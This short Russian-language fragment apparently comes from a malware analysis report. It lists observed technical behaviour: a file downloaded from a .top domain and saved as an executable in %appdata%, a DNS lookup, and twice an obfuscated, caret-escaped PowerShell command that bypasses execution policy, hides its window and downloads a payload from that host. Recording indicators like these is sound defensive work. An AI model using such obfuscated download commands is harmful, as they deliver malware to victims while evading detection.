Техническая информация
- http://footarepu.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOweRsHe^Ll.E^xe^ ^-^Exe^cUti^oNpO^lICY^ b^yP^ass -NOpR^oFILe -wINDo^w^S^TyLE ^hiddEN^ (NEw^-OB^J^ect ^S^yst^em^.n^et^.We^B^CLi^eNT).DO^w^n^lO^adfiL^E(^'http://footarepu.top/read.php?f=...
- DNS ASK fo###repu.top
- '<SYSTEM32>\cmd.exe' /c "pOweRsHe^Ll.E^xe^ ^-^Exe^cUti^oNpO^lICY^ b^yP^ass -NOpR^oFILe -wINDo^w^S^TyLE ^hiddEN^ (NEw^-OB^J^ect ^S^yst^em^.n^et^.We^B^CLi^eNT).DO^w^n^lO^adfiL^E(^'http://footarepu.top/read.php?f=...' (со скрытым окном)